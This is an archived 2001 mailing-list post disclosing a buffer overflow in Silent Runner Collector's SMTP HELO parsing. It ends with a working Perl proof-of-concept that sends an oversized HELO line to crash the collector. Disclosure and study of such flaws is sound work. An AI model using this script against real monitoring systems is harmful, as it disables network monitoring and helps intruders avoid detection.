OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Jack Hayes (jackhayesCABLESPEED.COM)
Date: Thu Mar 29 2001 - 19:06:19 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hello,

    Silent Runner Collector (SRC) has a buffer overflow condition in the
    routines
    that parse SMTP traffic. SRC is the "sniffer" conponent of the Silent
    Runner
    network traffic analysis suite. The overflow was noticed in SRC v1.6.1
    but is
    likely present in other versions as well. The actual buffer in
    question holds the
    SMTP HELO line. The overflow occurs when a HELO command in excess of
    4096 bytes transits a network segment that the collector is monitoring.
    This
    vulnerability can be exploited by an intruder to crash the collector and
    thus stop
    the monitoring of transiting network traffic. I'm not sure if this bug
    can be
    exploited in such a way as to allow for the execution of code on the
    sensor.
    Maybe someone else has some insight into the possibilities for
    arbitrary code
    execution?

    Jack

    #!/usr/bin/perl
    # This is a simple script that demonstrates the
    # SRC HELO overflow vulnerability. It will result
    # in a crashed silent runner collector so please do
    # not use it on production networks. It is intended
    # for demonstration purposes only.

    use IO::Socket;

    $remote_host = '192.168.111.3';
    $remote_port = 25;

    $buf = 'A' x 4092;

    $socket = IO::Socket::INET->new(PeerAddr => $remote_host,

    PeerPort => $remote_port,

    Proto => "tcp",

    Type => SOCK_STREAM)
    or die "Can't connect to $remote_host:$remote_port : $\n";

    # 'HELO ' + $buf = 4097 bytes ( 1 byte too much)
    print $socket "HELO $buf";

    exit;